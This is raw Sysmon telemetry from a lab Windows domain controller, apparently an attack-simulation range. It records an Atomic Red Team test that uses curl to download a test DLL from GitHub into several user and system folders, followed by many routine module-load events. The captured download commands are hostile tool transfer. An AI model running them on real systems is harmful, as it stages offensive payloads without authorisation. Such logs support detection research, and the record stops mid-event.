154100x800000000000000034354048Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:41.991{8B6011A9-F329-616E-043B-01000000F101}2936C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\users\public\music\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\programdata\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %%Temp%%\allthethingsx64.dll" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 534500x800000000000000034354242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.453{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exe 11241100x800000000000000034354241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.448{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\allthethingsx64.dll2021-10-19 16:32:42.447 734700x800000000000000034354240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.423{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000034354239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.422{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000034354238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.422{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000034354237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.421{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000034354236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.400{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000034354235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.400{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x800000000000000034354234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.399{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354233Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.399{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.398{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354231Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.398{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000034354230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.398{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x800000000000000034354229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.398{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.398{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x800000000000000034354227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 16:32:42.398{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x800000000000000034354226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.397{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000034354225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.397{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000034354224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.396{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 734700x800000000000000034354223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.395{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000034354222Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.394{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000034354221Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.394{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000034354220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.391{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000034354219Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.390{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000034354218Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.390{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000034354217Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.389{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000034354216Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.389{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000034354215Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.389{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000034354214Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.389{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000034354213Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.388{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000034354212Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.388{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000034354211Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.388{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000034354210Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.387{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000034354209Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.387{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000034354208Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.387{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000034354207Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.386{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000034354206Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.386{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000034354205Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.385{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000034354204Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.385{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000034354203Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.384{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000034354202Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.384{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 25542500x800000000000000034354201Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.384{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000034354200Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.383{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000034354199Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.383{8B6011A9-F329-616E-043B-01000000F101}29362664C:\Windows\system32\cmd.exe{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000034354198Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.383{8B6011A9-F32A-616E-083B-01000000F101}2544C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeC:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o C:\Users\ADMINI~1\AppData\Local\Temp\2\allthethingsx64.dll C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-F329-616E-043B-01000000F101}2936C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\users\public\music\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\programdata\allthethingsx64.dll & C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\allthethingsx64.dll" 534500x800000000000000034354197Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.380{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exe 11241100x800000000000000034354196Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.375{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\ProgramData\allthethingsx64.dll2021-10-19 16:32:42.374 734700x800000000000000034354195Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.351{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000034354194Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.351{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000034354193Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.349{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000034354192Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.349{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000034354191Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.334{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000034354190Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-10-19 16:32:42.334{8B6011A9-F32A-616E-073B-01000000F101}3804C:\Windows\System32\Curl.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x800000000000000034354189Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-10-19 